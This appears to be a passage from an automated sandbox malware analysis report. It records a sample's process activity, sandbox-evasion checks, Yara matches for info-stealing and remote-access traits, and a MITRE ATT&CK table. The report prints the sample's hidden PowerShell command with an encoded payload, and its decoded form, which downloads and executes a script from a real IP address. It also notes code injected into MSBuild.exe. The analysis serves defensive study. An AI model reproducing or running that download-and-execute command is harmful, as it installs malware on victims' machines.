            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3450000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 18C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4388Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5371Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5541Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4294Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 2.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 4388 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 5371 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -17524406870024063s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2984Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1232Thread sleep count: 5541 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1232Thread sleep count: 4294 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000003.00000002.1368838282.0000028931817000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: MSBuild.exe, 0000000B.00000002.3713480379.0000000001651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, Look.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, Look.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.csJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $c=New-Object Net.WebClient;IEX $c.DownloadString('http://92.255.85.2/a.mp4')
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $c=New-Object Net.WebClient;IEX $c.DownloadString('http://92.255.85.2/a.mp4')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1153008Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -e jabjad0atgblahcalqbpagiaagblagmadaagae4azqb0ac4avwblagiaqwbsagkazqbuahqaowbjaeuawaagacqaywauaeqabwb3ag4ababvageazabtahqacgbpag4azwaoaccaaab0ahqacaa6ac8alwa5adialgayaduanqauadganqauadialwbhac4abqbwadqajwapaa==
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -e jabjad0atgblahcalqbpagiaagblagmadaagae4azqb0ac4avwblagiaqwbsagkazqbuahqaowbjaeuawaagacqaywauaeqabwb3ag4ababvageazabtahqacgbpag4azwaoaccaaab0ahqacaa6ac8alwa5adialgayaduanqauadganqauadialwbhac4abqbwadqajwapaa==Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7384, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.28919871ea0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.289198619b0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.289198619b0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.289198a1f40.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3711769567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7384, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		1
            Scripting            		311
            Process Injection            		1
            Disable or Modify Tools            		OS Credential Dumping111
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		12
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Native API            		Logon Script (Windows)Logon Script (Windows)311
            Process Injection            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive11
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts4
            PowerShell            		Login HookLogin Hook11
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Obfuscated Files or Information            		LSA Secrets13
            System Information Discovery            		SSHKeylogging113
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
